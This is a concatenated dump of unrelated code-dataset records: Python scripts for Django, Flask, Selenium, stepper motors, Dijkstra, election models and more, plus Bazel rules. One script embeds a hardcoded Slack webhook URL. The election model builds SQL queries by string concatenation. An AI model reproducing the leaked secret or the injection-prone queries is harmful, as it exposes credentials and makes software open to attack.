pass\n\n def format_resp(self):\n\n self.response.headers['Content-Type'] = 'application/json'\n\n if self.result_string:\n self.response.headers['Content-Type'] = 'text/plain'\n resp = self.result_string\n\n elif self.resp is not None:\n resp = json.dumps(self.resp)\n\n else:\n logging.error('format response type failure')\n self.response.out.write('format response type failure')\n return\n\n logging.info(resp)\n logging.info('request time: %s ' % str((datetime.today() - self.start_time)))\n self.response.out.write(resp)\n\n def set_debug(self):\n if 'localhost' in self.request.server_name or self.request.get('debug') == 'true':\n self.debug = True\n\n def get_reader(self, blobkey):\n\n blob_reader = BlobReader(blobkey)\n blob_iterator = BlobIterator(blob_reader)\n\n reader = csv.DictReader(\n blob_iterator,\n doublequote=True,\n escapechar='\\\\'\n )\n\n if isinstance(blobkey, str):\n logging.info('file: %s' % BlobInfo(BlobKey(blobkey)).filename)\n\n else:\n logging.info('file: %s' % BlobInfo(blobkey).filename)\n\n return reader\n\n def convertKey(self, value):\n try:\n key = int(value)\n return key\n except ValueError:\n return value\n\n","sub_path":"base/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"459738221","text":"from slic.devices.general.motor import Motor\nfrom ..general.detectors import CameraCA, CameraBS\nfrom slic.utils.eco_components.aliases import Alias, append_object_to_object\nfrom slic.core.adjustable import PVEnumAdjustable\n\n# from ..devices_general.epics_wrappers import EnumSelector\nfrom epics import PV\nfrom slic.utils.eco_epics.utilities_epics import EnumWrapper\n\n\ndef addMotorToSelf(self, Id=None, name=None):\n self.__dict__[name] = Motor(Id, name=name)\n self.alias.append(self.__dict__[name].alias)\n\n\nclass Pprm:\n\n def __init__(self, Id, name=None):\n self.Id = Id\n self.name = name\n self.target_pos = Motor(Id + \":MOTOR_PROBE\", name=\"target_pos\")\n self.cam = CameraCA(Id)\n self.led = PVEnumAdjustable(self.Id + \":LED\", name=\"led\")\n self.target = PVEnumAdjustable(self.Id + \":PROBE_SP\", name=\"target\")\n if name:\n self.alias = Alias(name)\n self.alias.append(self.target_pos.alias)\n self.alias.append(self.target.alias)\n self.alias.append(self.led.alias)\n\n def movein(self, target=1):\n self.target.set_target_value(target)\n\n def moveout(self, target=0):\n self.target.set_target_value(target)\n\n def __repr__(self):\n s = f\"**Profile Monitor {self.name}**\\n\"\n s += f\"Target in beam: {self.target.get_current_value().name}\\n\"\n return s\n\n\nclass Bernina_XEYE:\n\n def __init__(self, camera_pv=None, zoomstage_pv=None, bshost=None, bsport=None, name=None):\n self.alias = Alias(name)\n self.name = name\n if zoomstage_pv:\n append_object_to_object(self, Motor, zoomstage_pv, name=\"zoom\")\n try:\n self.cam = CameraCA(camera_pv)\n except:\n print(\"X-Ray eye Cam not found\")\n pass\n\n if bshost:\n self.camBS = CameraBS(host=bshost, port=bsport)\n\n def get_adjustable_positions_str(self):\n ostr = \"*****Xeye motor positions******\\n\"\n\n for tkey, item in self.__dict__.items():\n if hasattr(item, \"get_current_value\"):\n pos = item.get_current_value()\n ostr += \" \" + tkey.ljust(17) + \" : % 14g\\n\" % pos\n return ostr\n\n def __repr__(self):\n return self.get_adjustable_positions_str()\n\n\n# self._led = PV(self.Id+':LED')\n\n\n# def illuminate(self,value=None):\n# if value:\n# self._led.put(value)\n# else:\n# self._led.put(\n# not self.get_illumination_state())\n#\n# def get_illumination_state(self):\n# return bool(self._led.get())\n#\n\n\n\n","sub_path":"slic/devices/xdiagnostics/profile_monitors_new.py","file_name":"profile_monitors_new.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"619408838","text":"import imaplib\nimport email\nfrom email import policy \nimport requests\nimport json\n\nslack_webhook_url = \"https://hooks.slack.com/services/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\"\n\ndef sendSlackWebhook(strText):\n headers = {\n \"Content-type\": \"application/json\"\n }\n\n data = {\n \"text\" : strText\n }\n\n res = requests.post(slack_webhook_url, headers=headers, data=json.dumps(data))\n \n if res.status_code == 200:\n return \"ok\"\n else:\n return \"error\"\n\ndef find_encoding_info(txt): \n info = email.header.decode_header(txt)\n subject, encode = info[0]\n return subject, encode\n\nimap = imaplib.IMAP4_SSL('imap.naver.com')\nid = '아이디'\npw = '비밀번호'\nimap.login(id, pw)\n\nimap.select('INBOX')\nresp, data = imap.uid('search', None, 'All')\nall_email = data[0].split()\nlast_email = all_email[-5:] \n\nfor mail in reversed(last_email):\n result, data = imap.uid('fetch', mail, '(RFC822)')\n raw_email = data[0][1]\n email_message = email.message_from_bytes(raw_email, policy=policy.default) \n\n email_from = str(email_message['From'])\n email_date = str(email_message['Date'])\n subject, encode = find_encoding_info(email_message['Subject'])\n subject_str = str(subject)\n if subject_str.find(\"정산\") >= 0:\n slack_send_message = email_from + '\\n' + email_date + '\\n' + subject_str\n sendSlackWebhook(slack_send_message)\n print(slack_send_message)\n\nimap.close()\nimap.logout()","sub_path":"main16-3.py","file_name":"main16-3.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"307232115","text":"\"\"\"archivo URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.conf.urls import include, url\nfrom gam_app import views\nfrom django.contrib.flatpages import views as flat_views\nfrom dal import autocomplete\nfrom gam_app.views import *\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('registration.backends.hmac.urls')),\n path('i18n/', include('django.conf.urls.i18n')),\n]\n\nurlpatterns += i18n_patterns(\n path('', views.index, name='index'),\n path('buscar/', views.search, name='search'),\n path('cuentas/', include('django.contrib.auth.urls')),\n path('control-de-misión/', views.mission_control, name='mission_control'),\n path('persona/create/', PersonaCreate.as_view(), name='persona_create'),\n path('persona//update/', PersonaUpdate.as_view(), name='persona_update'),\n path('personalookup/', PersonaNameLookup.as_view(), name='persona_name_lookup'),\n path('lugar/create/', LugarCreate.as_view(), name='lugar_create'),\n path('lugar//update/', LugarUpdate.as_view(), name='lugar_update'),\n path('lugarlookup/', LugarNameLookup.as_view(), name='lugar_name_lookup'),\n path('organizacion/create/', OrganizacionCreate.as_view(), name='organizacion_create'),\n path('organizacion//update/', OrganizacionUpdate.as_view(), name='organizacion_update'),\n path('organizacionlookup/', OrganizacionNameLookup.as_view(), name='organizacion_name_lookup'),\n path('autocompletar_manuscrito/', autocompletar_manuscrito.as_view(), name='autocompletar_manuscrito'),\n path('necisita_transcripción', views.necisita_transcripción, name='necisita_transcripción'),\n path('crear_usuario/', include('registration.backends.simple.urls')),\n path('file/', views.document, name='document'),\n path('editar/', views.document_edit, name='document_edit'),\n path('dzi/', views.dzi, name='dzi'),\n path('caso/', views.caso, name='caso'),\n path('advanced_search_submit/', views.advanced_search_submit, name='advanced-search-submit'),\n path('sobre/', flat_views.flatpage, {'url': '/es/sobre/'}, name='sobre'),\n path('about/', flat_views.flatpage, {'url': '/en/about/'}, name='about'),\n path('documentos/', views.all_documents, name='all_documents'),\n path('portapapeles/', views.espacio_de_trabajo, name='espacio_de_trabajo'),\n path('portapapeles/', views.portapapeles, name='portapapeles'),\n path('texto/', views.todo_texto, name='all_texto'),\n path('explorar/', views.explorar, name='explorar'),\n path('caso/', views.single_caso, name='single_caso'),\n path('lugar/', views.lugar, name='lugar'),\n path('persona/', views.persona, name='persona'),\n path('procesamiento//////', views.procesamiento, name='procesamiento'),\n #paths for physical location urls\n path('//////', views.documento5, name='documento5'),\n path('/////', views.documento4, name='documento4'),\n path('////', views.documento3, name='documento3'),\n path('///', views.documento2, name='documento2'),\n path('//', views.documento1, name='documento1'),\n path('/', views.documento0, name='documento0'),\n)\n","sub_path":"archivo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"101557381","text":"\n# This function takes last element as pivot, places\n# the pivot element at its correct position in sorted\n# array, and places all smaller (smaller than pivot)\n# to left of pivot and all greater elements to right\n# of pivot\n\n\ndef partition(arr,low,high):\n count=0\n i = ( low-1 ) # index of smaller element\n pivot = arr[high] # pivot\n print(\"pivot is: \",pivot)\n\n for j in range(low , high):\n # If current element is smaller than or\n # equal to pivot\n count+=1\n if arr[j] <= pivot:\n\n # increment index of smaller element\n i = i+1\n print(\"swap: \"+ str(i) +\" and \" + str(j))\n arr[i],arr[j] = arr[j],arr[i]\n print(arr[low:high+1])\n\n print(\"L swap: \" + str(high) +\" and \" + str(i+1))\n arr[i+1],arr[high] = arr[high],arr[i+1]\n print(\"count is: \", count)\n print(arr)\n return ( i+1 )\n\n# The main function that implements QuickSort\n# arr[] --> Array to be sorted,\n# low --> Starting index,\n# high --> Ending index\n\n# Function to do Quick sort\ndef quickSort(arr,low,high):\n if low < high:\n\n # pi is partitioning index, arr[p] is now\n # at right place\n pi = partition(arr,low,high)\n # Separately sort elements before\n # partition and after partition\n #quickSort(arr, low, pi-1)\n #quickSort(arr, pi+1, high)\n\n#arr = [1, 2, 3, 4, 5, 6, 7]\n#arr = [7, 6, 5, 4, 3, 2, 1]\n#arr = [2, 2, 2, 2, 2, 2, 2]\n#arr = [2,2,2]\narr= [1,4,7,2,8,6]\nprint(\"original arr: \",arr)\nn = len(arr)\nquickSort(arr,0,n-1)\n\nprint (\"Sorted array is: \", arr)\n","sub_path":"algo9.py","file_name":"algo9.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"15833199","text":"from flask import make_response, abort, request\nfrom . import web\nfrom config import config\nfrom directory_app.directory import directory\nimport auth\nimport json\n\t\t\n'''\n\tThe following functions handle routed web requests for Directory searches\n'''\t\n\n@web.route(config.directory_uri_path + '/details', methods = ['GET'])\n@auth.requires_auth(scope='general')\ndef details():\n\t'''\n\t\tVerify eligibility to vote in the ASPSU student elections\n\t'''\n\tglobal request\n\n\tperson_id = request.args.get('id')\n\tdirectory.log.info('details(): person_id: ' + str(person_id))\n\t\n\tdirectory.log.info('details(): called from remote address: ' + str(request.remote_addr) + ', for end point: ' + str(request.endpoint))\n\tuser = request.authorization.username\n\tstatus = directory.get_detail(person_id, user=user)\n\tif 'details' in status:\n\t\treturn(make_response(json.dumps(status), 200, {'Content-Type': 'application/json'}))\n\telse:\n\t\tabort(config.people_code_by_error[status['error']['type']], status)\n\n\n@web.route(config.directory_uri_path + '/search', methods = ['GET'])\n@auth.requires_auth(scope='general')\ndef search():\n\t'''\n\t\tVerify eligibility to vote in the ASPSU student elections\n\t'''\n\tglobal request\n\n\tquery = request.args.get('q')\n\tdirectory.log.info('search(): query: ' + str(query))\n\tdirectory.log.info('search(): query type: ' + str(type(query)))\n\tuser = request.authorization.username\n\tdirectory.log.info('search(): called from remote address: ' + str(request.remote_addr) + ', for end point: ' + str(request.endpoint))\n\tstatus = directory.search(query.split(), user=user)\n\tif 'directory' in status:\n\t\treturn(make_response(json.dumps(status), 200, {'Content-Type': 'application/json'}))\n\telse:\n\t\tabort(config.people_code_by_error[status['error']['type']], status)\n\n\n","sub_path":"courses_app/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"157269695","text":"load(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\")\n\nPLUGIN_VERSION = \"1.9.0\"\n\ndef java_proto_deps():\n existing = native.existing_rules()\n\n if \"protoc_gen_grpc_java_linux_x86_64\" not in existing:\n native.http_file(\n name = \"protoc_gen_grpc_java_linux_x86_64\",\n url = \"https://repo1.maven.org/maven2/io/grpc/protoc-gen-grpc-java/{plugin_version}/protoc-gen-grpc-java-{plugin_version}-linux-x86_64.exe\".format(\n plugin_version = PLUGIN_VERSION,\n ),\n sha256 = \"f20cc8c052eea904c5a979c140237696e3f187f35deac49cd70b16dc0635f463\",\n )\n\n if \"protoc_gen_grpc_java_linux_macosx\" not in existing:\n native.http_file(\n name = \"protoc_gen_grpc_java_linux_macosx\",\n url = \"https://repo1.maven.org/maven2/io/grpc/protoc-gen-grpc-java/{plugin_version}/protoc-gen-grpc-java-{plugin_version}-macosx.exe\".format(\n plugin_version = PLUGIN_VERSION,\n ),\n sha256 = \"593937361f99e8b145fe29c78c71cdd00e8327ae88de010729479eb2acdc1de9\",\n )\n\n if \"io_grpc_grpc_java\" not in existing:\n http_archive(\n name = \"io_grpc_grpc_java\",\n urls = [\"https://github.com/grpc/grpc-java/archive/v1.15.0.tar.gz\"],\n strip_prefix = \"grpc-java-1.15.0\",\n sha256 = \"8a131e773b1c9c0442e606b7fc85d7fc6739659281589d01bd917ceda218a1c7\",\n )\n","sub_path":"java/deps.bzl","file_name":"deps.bzl","file_ext":"bzl","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"633178869","text":"from selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport math\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom locators import BasePageLocators\n\nclass BasketPage():\n\n def __init__(self, browser, url, timeout=10):\n self.browser = browser\n self.url = url\n self.browser.implicitly_wait(timeout)\n\n def open(self): \n self.browser.get(self.url)\n\n def is_element_present(self, how, what):\n try:\n self.browser.find_element(how, what)\n except (NoSuchElementException):\n return False\n return True\n\n def is_not_element_present(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return True\n\n return False\n\n def is_disappeared(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout, 1, TimeoutException).\\\n until_not(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n return True\n\n def go_to_basket_page(self):\n link = self.browser.find_element(*BasePageLocators.BASKET)\n link.click()\n\n def should_be_empty_basket(self):\n assert self.is_not_element_present(*BasePageLocators.EMPTY), \"Basket is not empty\"\n\n def should_be_empty_text(self):\n assert self.is_element_present(*BasePageLocators.TEXT_EMPTY), \"No text about empty basket\"","sub_path":"pages/basket_page.py","file_name":"basket_page.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"272744961","text":"from time import sleep\nimport pigpio\n\nDIR = 20 # Direction GPIO Pin\nSTEP = 21 # Step GPIO Pin\nWORK = 16\nSLEEP = 12\n\n# Connect to pigpiod daemon\npi = pigpio.pi()\n\n# Set up pins as an output\npi.set_mode(DIR, pigpio.OUTPUT)\npi.set_mode(STEP, pigpio.OUTPUT)\n\n# Set up input switch\npi.set_mode(WORK, pigpio.OUTPUT)\npi.write(WORK, 1)\n\nmodus = 0\n\n\nMODE = (14, 15, 18) # Microstep Resolution GPIO Pins\n\nRESOLUTION = {0: (0, 0, 0),\n 1: (1, 0, 0),\n 2: (0, 1, 0),\n 3: (1, 1, 0),\n 4: (0, 0, 1),\n 5: (1, 0, 1)}\n\n\nRESOLUTION = {0: (0, 0, 0),\n 1: (1, 0, 0),\n 2: (0, 1, 0),\n 3: (1, 1, 0),\n 4: (0, 1, 1),\n 5: (1, 1, 1)}\nfor i in range(3):\n pi.write(MODE[i], RESOLUTION[modus][i])\n\npi.write(DIR,1)\n\n### Set duty cycle and frequency\npi.set_PWM_dutycycle(STEP, 128) # PWM 1/2 On 1/2 Off\n###pi.set_PWM_frequency(STEP, 500) # 500 pulses per second\n\nimport socket # Import socket module\n\ns = socket.socket() # Create a socket object\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nhost = \"0.0.0.0\"#socket.gethostname() # Get local machine name\nport = 5000 # Reserve a port for your service.\ns.bind((host, port)) # Bind to the port\ns.listen(1)\n\nsomeoneConnected = False\n\n\n\ntry:\n while True:\n while someoneConnected:\n data = conn.recv(1024)\n if data:\n data = data.decode(\"utf-8\") \n #print(\"no data\")\n data = data.split(\"\\n\",1)[0]\n if data == \"DISCONNECT\":\n conn.close()\n someoneConnected = False\n if data.startswith(\"speed:\"):\n speed = data[len(\"speed:\"):]\n speed = int(speed)\n if (speed):\n pi.set_PWM_frequency(STEP, speed*10)\n if data.startswith(\"status:\"):\n if data == \"status:drive\":\n pi.write(WORK,1)\n pi.write(SLEEP,1)\n if data == \"status:hold\":\n pi.write(WORK,0)\n pi.write(SLEEP,1)\n if data == \"status:sleep\":\n pi.write(WORK,0)\n pi.write(SLEEP,0)\n if data.startswith(\"Microstepping:\"):\n modus = data[len(\"Microstepping:\"):]\n print(\"Set Mode to:\")\n modus = int(modus)\n \n for i in range(3):\n pi.write(MODE[i], RESOLUTION[modus][i])\n \n \n \n \n print(data)\n print(\"keiner verbunden!\")\n conn, addr = s.accept()\n print('Got connection from', addr)\n someoneConnected = True\n\nexcept KeyboardInterrupt:\n print (\"\\nCtrl-C pressed. Stopping PIGPIO and exiting...\")\nfinally:\n pi.set_PWM_dutycycle(STEP, 0) # PWM off\n pi.write(WORK, 0)\n pi.stop()\n\n\n\n","sub_path":"slider_v2/slider_stepper_einer.py","file_name":"slider_stepper_einer.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"363665364","text":"def generator_new(generator):\n g = generator()\n result = None\n __pragma__(\"js\", \"{}\", \"\"\"\n function *makeIterator() {\n result = g.next();\n \"\"\")\n while not result.done:\n value = result.value\n __pragma__(\"js\", \"{}\", \"\"\"\n yield value;\n result = g.next();\n \"\"\")\n __pragma__(\"js\", \"{}\", \"\"\"\n }\n result = makeIterator();\n \"\"\")\n return result\n","sub_path":"src/tfchain/polyfill/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"135539709","text":"def dijkstra(graph,src,dest,visited=[],distances={},predecessors={}):\n \"\"\" calculates a shortest path tree routed in src\n \"\"\" \n # a few sanity checks\n if src not in graph:\n raise TypeError('The root of the shortest path tree cannot be found')\n if dest not in graph:\n raise TypeError('The target of the shortest path cannot be found') \n # ending condition\n if src == dest:\n # We build the shortest path and display it\n path=[]\n pred=dest\n while pred != None:\n path.append(pred)\n pred=predecessors.get(pred,None)\n print('shortest path: '+str(path)+\" cost=\"+str(distances[dest])) \n else : \n # if it is the initial run, initializes the cost\n if not visited: \n distances[src]=0\n # visit the neighbors\n for neighbor in graph[src] :\n if neighbor not in visited:\n new_distance = distances[src] + graph[src][neighbor]\n if new_distance < distances.get(neighbor,float('inf')):\n distances[neighbor] = new_distance\n predecessors[neighbor] = src\n # mark as visited\n visited.append(src)\n # now that all neighbors have been visited: recurse \n # select the non visited node with lowest distance 'x'\n # run Dijskstra with src='x'\n unvisited={}\n for k in graph:\n if k not in visited:\n unvisited[k] = distances.get(k,float('inf')) \n x=min(unvisited, key=unvisited.get)\n dijkstra(graph,x,dest,visited,distances,predecessors)\n \n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n #unittest.main()\n graph = {'a1': {'b1': 1},\n 'a2': {'a1': 1},\n 'a3': {'b3': 1,'a2': 1},\n 'a4': {'b4': 1},\n 'b1': {'c1': 1},\n 'b2': {'a2': 1},\n 'b3': {'c3': 1},\n 'b4': {'a4': 1},\n 'c1': {'d1': 1, 'f1': 1},\n 'c2': {'b2': 1},\n 'c3': {'d3': 1, 'f3': 1},\n 'c4': {'b4': 1},\n 'd1': {'d2': 1, 'f1': 1},\n 'd2': {'d3': 1, 'f3': 1},\n 'd3': {'d4': 1},\n 'd4': {'c4': 1},\n 'e1': {'f1': 1},\n 'e2': {'e1': 1},\n 'e3': {'e2': 1, 'f3': 1, 'c2': 1},\n 'e4': {'e3': 1},\n 'f1': {'g1': 1},\n 'f2': {'d3': 1, 'c2': 1, 'e2': 1},\n 'f3': {'g3': 1},\n 'f4': {'e4': 1, 'c4': 1},\n 'g1': {'i1': 1},\n 'g2': {'f2': 1},\n 'g3': {'h2': 1, 'i3': 1},\n 'g4': {'f4': 1},\n 'h1': {'i4': 1},\n 'h2': {'h1': 1},\n 'h3': {'h2': 1, 'i3': 1},\n 'h4': {'h3': 1},\n 'i1': {'j1': 1},\n 'i2': {'g2': 1, 'h2': 1},\n 'i3': {'j3': 1},\n 'i4': {'h4': 1, 'g4': 1},\n 'j1': {'k1': 1},\n 'j2': {'i2': 1},\n 'j3': {'k3': 1},\n 'j4': {'i4': 1},\n 'k1': {'k2': 1},\n 'k2': {'j2': 1, 'k3': 1},\n 'k3': {'k4': 1},\n 'k4': {'j4': 1}}\n \n \n dijkstra(graph,'a3','a1')\n","sub_path":"our_dijikstra.py","file_name":"our_dijikstra.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"278425400","text":"import matplotlib.pyplot as plt\n\nfrom helpers.strings import COLORS\n\n\nclass APUGraphic:\n def __init__(self, time_line):\n self.time_line = time_line\n plt.style.use('seaborn-bright')\n # plt.tight_layout()\n\n def create_graphic(self, graphic_name, args):\n fig, ax = plt.subplots(figsize=(10, 6))\n if len(args) == 4:\n ax.plot(self.time_line, args[0], color=COLORS[0], marker='*', label=args[2])\n ax.plot(self.time_line, args[1], color=COLORS[1], marker='o', label=args[3])\n else:\n ax.plot(self.time_line, args[0], color=COLORS[0], marker='*', label=args[3])\n ax.plot(self.time_line, args[1], color=COLORS[1], marker='o', label=args[4])\n ax.plot(self.time_line, args[2], color=COLORS[2], marker='|', label=args[5])\n ax.set_xlabel('Time')\n ax.set_ylabel('Data')\n ax.legend(loc='best')\n ax.tick_params(axis='x', which='minor', labelsize=3)\n plt.xticks(self.time_line, rotation=90)\n plt.show()\n fig.savefig(f'files/graphics/{graphic_name}.png', bbox_inches='tight')\n plt.close(fig)\n\n\n","sub_path":"graphic.py","file_name":"graphic.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"400847701","text":"import pypyodbc\r\nimport Constants\r\nfrom ContestantModel import ContestantModel\r\nfrom ElectionModel import ElectionModel\r\n\r\nfrom PoliticalPartyModel import PoliticalPartyModel\r\nfrom ConstituencyModel import ConstituencyModel\r\nclass ElectionNominationModel:\r\n def __init__(self, uniqueID=0, electionID=0, electionModel=None, contestantID=0, contestantModel = None, politicalPartyID=0, politicalPartyModel=None, constituencyID=0, constituencyModel=None):\r\n self.uniqueID = uniqueID\r\n self.electionID = electionID\r\n self.electionModel = electionModel\r\n self.contestantID = contestantID\r\n self.contestantModel = contestantModel\r\n self.politicalPartyID = politicalPartyID\r\n self.politicalPartyModel = politicalPartyModel\r\n \r\n self.constituencyID = constituencyID\r\n self.constituencyModel = constituencyModel\r\n \r\n \r\n @staticmethod\r\n def ElectionNominationgetElectionByID(rid):\r\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\r\n cur3 = conn3.cursor()\r\n \r\n sqlcmd = \"SELECT * FROM ContestantElectionDetails WHERE uniqueID = '\"+str(rid)+\"'\"\r\n print(sqlcmd)\r\n cur3.execute(sqlcmd)\r\n row = cur3.fetchone()\r\n electionNominationModel = None\r\n if row:\r\n contestantObject = ContestantModel.getContestantNameByID(row[1])\r\n politicalPartyObject = PoliticalPartyModel.getPoliticalPartyByID(row[2])\r\n electionObject = ElectionModel.getElectionNameByID(row[3])\r\n print(contestantObject.firstName)\r\n \r\n constituencyObject = ConstituencyModel.getConstituencyNameByID(row[4])\r\n \r\n electionNominationModel = ElectionNominationModel(row[0], electionID=row[1], electionModel=electionObject, contestantID= row[2], contestantModel = contestantObject, politicalPartyID=row[3], politicalPartyModel = politicalPartyObject, constituencyID = row[4], constituencyModel=constituencyObject)\r\n return electionNominationModel \r\n \r\n \r\n @staticmethod\r\n def getAllContestantByElectionByConstituency(electionID, constituencyID):\r\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\r\n cur3 = conn3.cursor()\r\n \r\n sqlcmd = \"\"\"SELECT ContestantMaster.contestantID, firstName FROM ContestantMaster \r\n INNER JOIN ContestantElectionDetails ON ContestantElectionDetails.contestantID = ContestantMaster.contestantID \r\n AND ContestantElectionDetails.electionID = '\"\"\"+str(electionID)+\"\"\"' \r\n AND ContestantElectionDetails.constituencyID = '\"\"\"+str(constituencyID)+\"\"\"'\"\"\"\r\n print(sqlcmd)\r\n cur3.execute(sqlcmd)\r\n \r\n contestantsList = []\r\n while True:\r\n row = cur3.fetchone()\r\n if not row:\r\n break\r\n contestantModel = ContestantModel(row[0], firstName=row[1])\r\n contestantsList.append(contestantModel)\r\n return contestantsList\r\n \r\n @staticmethod\r\n def getPoliticalPartyNameByElectionByConstituencyByContestantID(electionID, constituencyID, contestantID):\r\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\r\n cur3 = conn3.cursor()\r\n \r\n sqlcmd = \"\"\"SELECT politicalPartyName FROM ContestantElectionDetails \r\n INNER JOIN PoliticalPartyMaster ON PoliticalPartyMaster.PoliticalPartyID = ContestantElectionDetails.PoliticalPartyID \r\n AND ContestantElectionDetails.electionID = '\"\"\"+str(electionID)+\"\"\"' \r\n AND ContestantElectionDetails.constituencyID = '\"\"\"+str(constituencyID)+\"\"\"'\r\n AND ContestantElectionDetails.contestantID = '\"\"\"+str(contestantID)+\"\"\"'\"\"\"\r\n print(sqlcmd)\r\n cur3.execute(sqlcmd)\r\n \r\n politicalPatyName = \"\"\r\n row = cur3.fetchone()\r\n if row:\r\n politicalPatyName = row[0]\r\n return politicalPatyName ","sub_path":"project/2021/Evoting2019/src/ElectionNominationModel.py","file_name":"ElectionNominationModel.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"25381437","text":"from matplotlib.pyplot import *\nfrom PIL import ImageColor, Image\n\ninp = input().split(\" \")\nheight = int(inp[3])\nwidth = int(inp[4])\nim = Image.new(\"RGB\", (width, height))\n\nfor i in range(height):\n data = input().split(\" \")\n for j in range(width):\n cur = data[j]\n im.putpixel((j, i), ImageColor.getcolor(\"#\"+cur, 'RGB')) #Выполнит тоже самое\n\nfigure()\nimshow(im)\nshow() ","sub_path":"2task.py","file_name":"2task.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"432814658","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport re\nimport nysol.util.margs as margs\nimport nysol.mcmd as nm\nimport nysol.view.mnetpie as nnpie\nimport nysol.util as nu\n\n\nhelpMSG=\"\"\"\n概要) Nodeデータ&EdgeファイルからグラフD3を使ったHTMLを作成する\n\n書式) #{$cmd} ni= ei= ef= nf= [nodeSizeFld=] [nodeColorFld=] [edgeWidthFld=] [edgeColorFld=] pieDataFld= pieTipsFld= picFld= o= -undirect\n\ncircle pieChart 画像 をNodeとして利用可能\n\n\t\t\"\"\"\nif \"-help\" in sys.argv or \"--help\" in sys.argv:\n\tprint(helpMSG)\n\texit()\n\nkeylist=[\n\t[\"ei\",\"ni\",\"ef\",\"nf\",\"o\",\n\t\"nodeSizeFld\",\"pieDataFld\",\"pieTipsFld\",\n\t\"nodeTipsFld\",\"picFld\",\"nodeColorFld\",\n\t\"edgeWidthFld\",\"edgeColorFld\"],\n\t[\"undirect\",\"offline\"]\n]\nnparalist=[\n\t\"ei\",\"ni\",\"ef\",\"nf\",\"o\"\n]\n\nkwd = nu.margv2dict(sys.argv,keylist,nparalist)\nfooter = os.path.basename(sys.argv[0]) + \" \" + \" \".join(sys.argv[1:])\n\nnnpie.mnetpie(**kwd)\n\n\nnu.mmsg.endLog(footer)\n\n\n","sub_path":"scripts/mnetpie.py","file_name":"mnetpie.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"579934539","text":"import numpy as np\r\nimport pandas as pd\r\nimport math\r\nimport os\r\n\r\n\r\nclass Categorical_Encoding():\r\n \r\n param_dict_Col = {}\r\n def __init__ (self, strategy, variables,Topn=None, Target_Var= None):\r\n self.strategy = strategy\r\n self.variables = variables\r\n self.Target_Var = Target_Var\r\n self.Topn = Topn\r\n \r\n def fit(self,df): \r\n if self.strategy =='OneHot':\r\n for i in self.variables:\r\n varList = df[i].unique()\r\n self.param_dict_Col[i]= varList[:self.Topn] \r\n \r\n if self.strategy == 'Ratio_Encoding':\r\n for i in self.variables: \r\n df[i].fillna('Missing',inplace=True)\r\n df['Prob_Target_1'] = df[self.Target_Var]\r\n prob_df = pd.DataFrame(df.groupby([i])['Prob_Target_1'].mean()) \r\n prob_df['Prob_Target_0'] = 1- prob_df.Prob_Target_1\r\n prob_df['Ratio'] = prob_df.Prob_Target_1/prob_df.Prob_Target_0 \r\n self.param_dict_Col[i]= 